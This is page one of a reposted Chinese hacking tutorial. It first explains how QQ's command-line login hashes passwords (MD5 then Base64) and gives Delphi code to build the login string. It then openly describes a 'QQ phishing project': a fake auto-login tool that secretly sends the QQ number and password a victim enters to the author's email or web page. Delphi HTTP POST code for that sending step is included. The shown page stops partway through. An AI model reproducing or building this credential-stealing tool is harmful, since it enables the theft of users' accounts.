您现在的位置:中国QQ站QQ文章QQ安全 → 文章列表

探密QQ登陆加密算法兼谈简单打造一个QQ钓鱼工程(图)

作者:佚名  来源:不详  发布时间:2007-10-17 20:34:25   

减小字体 增大字体

 
 
文章作者:zshoucheng
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

转载请保持文章完整性

1.QQ登陆加密算法

QQ命令行启动方式:
Quote:

QQ.exe /START QQUIN:QQ号码 PWDHASH:加密后的QQ密码 /STAT:登陆状态(40隐身,41正常)

其中PWDhash 原本是为实现 QQ 与 TM无缝切换而用的将密码加密传递的参数。使得用户能在 QQ 与 TM 之间快速切换而不用再次输入密码。

PWDHASH就是对我们的原始QQ密码进行MD5散列算法处理,得到一个16字节的MD5 HASH 字节组,然后再用BASE64编码对这个HASH字节组做第二次编码得到的。理论上说是无法从PWDHASH反推出原始的QQ密码的。但是,如果密码过于简单,如纯数字之类的,是可能被简单暴力破解的。

下面以Delphi代码讲解,附件中有Delphi的实现单元和相应的C#类,目的是让大家能够选择自己喜欢的编程语言实现

获取QQ命令行启动参数函数:(参数:QQ号码、QQ密码、登陆状态)
Code Language : Delphi
  1.  
  2. function GetCommandLine(QQNum, QQPw: string; QQState: integer): string;
  3. type
  4.    TempChar = array[0..15] of char;
  5. var
  6.    md5: TIdHashMessageDigest5;
  7. begin
  8.    md5 := TIdHashMessageDigest5.Create;
  9.    result := ' /START QQUIN:' + QQNum + ' PWDHASH:' + Base64(TempChar(md5.HashValue(QQPw))) + ' /STAT:' + IntToStr(QQState);
  10.    md5.Free;
  11. end;
  12.  
Parsed in 0.010 seconds
上面函数用到的Base64函数为:
Code Language : Delphi
  1.  
  2. function Base64(Src: string): string;
  3. const
  4.    DataSet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
  5. var
  6.    i, ModLen: integer;
  7.    Current: string;
  8.    Buf: array[1..3] of Byte;
  9.    NewBuf: array[1..4] of Byte;
  10. begin
  11.    result := '';
  12.    if Src = '' then
  13.       exit;
  14.    ModLen := Length(Src) mod 3;
  15.    while Length(Src) > 0 do
  16.    begin
  17.       FillChar(Buf, 3, #0);
  18.       Current := Copy(Src, 1, 3);
  19.       Src := Copy(Src, 4, Length(Src) - 3);
  20.       for i := 1 to 3 do
  21.          Buf[i] := Ord(Current[i]);
  22.       NewBuf[1] := Buf[1] shr 2;
  23.       NewBuf[2] := (Buf[1] shl 6 shr 2 or Buf[2] shr 4) and $3F;
  24.       NewBuf[3] := (Buf[2] shl 4 shr 2 or Buf[3] shr 6) and $3F;
  25.       NewBuf[4] := Buf[3] and $3F;
  26.       for i := 1 to 4 do
  27.          result := result + DataSet[NewBuf[i] + 1];
  28.    end;
  29.    if ModLen >= 1 then
  30.       result[Length(result)] := '=';
  31.    if ModLen = 1 then
  32.       result[Length(result) - 1] := '=';
  33. end;
  34.  
Parsed in 0.025 seconds
这样就可以实现从命令行直接登陆QQ了。

另外我们还要获取QQ的安装路径:
在注册表的 HKEY_LOCAL_MACHINE\SOFTWARE\TENCENT\PLATFORM_TYPE_LIST 下面有几个子键,1中的 TypePath 的键值为 QQ 的安装路径,2中的 TypePath 的键值为 TM 的安装路径。我们就可以通过读取注册表来获取QQ的安装路径了(其实现比较简单,请参见源码)。

2.简单打造QQ钓鱼工程

有了上面的QQ自动登陆的实现,我们就可以写出一个QQ自动登陆器了。这就和我要说的QQ钓鱼工程联系上了,聪明的你一定也想出来了。
编写一款优秀的QQ木马去截获QQ密码框中的密码对我等小菜来说难以实现,但我们却可以变相地去获取QQ密码:
当别人使用我们的QQ自动登陆器登陆QQ时,我们可以把他所输入的QQ以及密码发送到我们的邮箱或指定网页上,这里给出ASP发信的代码:
Code Language : Delphi
  1.  
  2. function HtmlEncode(s: string): string;
  3. var
  4.    i, v1, v2: integer;
  5.    function i2s(b: byte): char;
  6.    begin
  7.       if b <= 9 then result := chr($30 + b)
  8.       else result := chr($41 - 10 + b);
  9.    end;
  10. begin
  11.    result := '';
  12.    for i := 1 to length(s) do
  13.       if s[i] = ' ' then result := result + '+'
  14.       else if (s[i] < ' ') or (s[i] in ['/', '\', ':', '&', '?', '|']) then
  15.       begin
  16.          v1 := ord(s[i]) mod 16;
  17.          v2 := ord(s[i]) div 16;
  18.          result := result + '%' + i2s(v2) + i2s(v1);
  19.       end
  20.       else result := result + s[i];
  21. end;
  22.  
  23. function UpperCase(AStr: string): string; overload;
  24. var
  25.    LI: Integer;
  26. begin
  27.    Result := AStr;
  28.    for LI := 1 to Length(Result) do
  29.       Result[LI] := UpCase(Result[LI]);
  30. end;
  31.  
  32. italic">// 以Post方式发信
  33. function PostURL(const aUrl: string; FTPostQuery: string; const strPostOkResult: string = 'Send OK!'): Boolean;
  34. var
  35.    hSession: HINTERNET;
  36.    hConnect, hRequest: hInternet;
  37.    lpBuffer: array[0..1024 + 1] of Char;
  38.    dwBytesRead: DWORD;
  39.    HttpStr: string;
  40.    HostName, FileName: string;
  41.    FTResult: Boolean;
  42.    AcceptType: LPStr;
  43.    Buf: Pointer;
  44.    dwBufLen, dwIndex: DWord;
  45.    procedure ParseURL(URL: string; var HostName, FileName: string);
  46.       procedure ReplaceChar(c1, c2: Char; var St: string);
  47.       var
  48.          p: Integer;
  49.       begin
  50.          while True do
  51.          begin
  52.             p := Pos(c1, St);
  53.             if p = 0 then Break
  54.             else St[p] := c2;
  55.          end;
  56.       end;
  57.    var
  58.       i: Integer;
  59.    begin
  60.       if Pos(UpperCase('http://'), UpperCase(URL)) <> 0 then
  61.          System.Delete(URL, 1, 7);
  62.       i := Pos('/', URL);
  63.       HostName := Copy(URL, 1, i);
  64.       FileName := Copy(URL, i, Length(URL) - i + 1);
  65.       if (Length(HostName) > 0) and (HostName[Length(HostName)] = '/') then
  66.          SetLength(HostName, Length(HostName) - 1);
  67.    end;
  68. begin
  69.    Result := False;
  70.    hSession := InternetOpen('MyApp', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
  71.    try
  72.       if Assigned(hSession) then
  73.       begin
  74.          ParseURL(aUrl, HostName, FileName);
  75.          hConnect := InternetConnect(hSession, PChar(HostName),
  76.          INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 0);
  77.          AcceptType := PChar('Accept: */*');
  78.          hRequest := HttpOpenRequest(hConnect, 'POST', PChar(FileName), 'HTTP/1.0',
  79.             nil, @AcceptType, INTERNET_FLAG_RELOAD, 0);
  80.          HttpSendRequest(hRequest, 'Content-Type: application/x-www-form-urlencoded', 47,
  81.             PChar(FTPostQuery), Length(FTPostQuery));
  82.          dwIndex := 0;
  83.          dwBufLen := 1024;
  84.          GetMem(Buf, dwBufLen);
  85.          FTResult := HttpQueryInfo(hRequest, HTTP_QUERY_CONTENT_LENGTH,
  86.             Buf, dwBufLen, dwIndex);
  87.          if FTResult = True then
  88.          try
  89.             while True do
  90.             begin
  91.                dwBytesRead := 1024;
  92.                InternetReadFile(hRequest, @lpBuffer, 1024, dwBytesRead);
  93.                if dwBytesRead = 0 then break;
  94.                lpBuffer[dwBytesRead] := #0;
  95.                HttpStr := HttpStr + lpBuffer;
  96.             end;
  97.             Result := pos(strPostOkResult, HttpStr) > 0;
  98.          finally
  99.             InternetCloseHandle(hRequest);
  100.             InternetCloseHandle(hConnect);
  101.          end;
  102.       end;
  103.    finally
  104.       InternetCloseHandle(hSession);
  105.    end;
  106. end;
  107.  
Parsed in 0.081 seconds

[1] [2]  下一页

转贴于:中国QQ站

  • 上一篇文章:QQ大盗病毒活动猖獗 秘密窃取用户QQ密码
  • 下一篇文章:制作一个简易的QQ炸弹立即实现你的攻击阴谋

  • 阅读统计:[]

    • 中国QQ站】【设为主页】【收藏本页】【打印本文】【回到顶部】【关闭此页

    相关文章
    文章评论(评论内容只代表网友观点,与本站立场无关!)

    用户名: 查看更多评论

    分 值:100分 85分 70分 55分 40分 25分 10分 0分

    内 容:

             (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码
     栏目导航
     分类广告
     热门文章
    设为首页 - 关于我们 - 广告服务 - 网站地图 - 加入收藏 - 网站声明 - 网站帮助 - 友情链接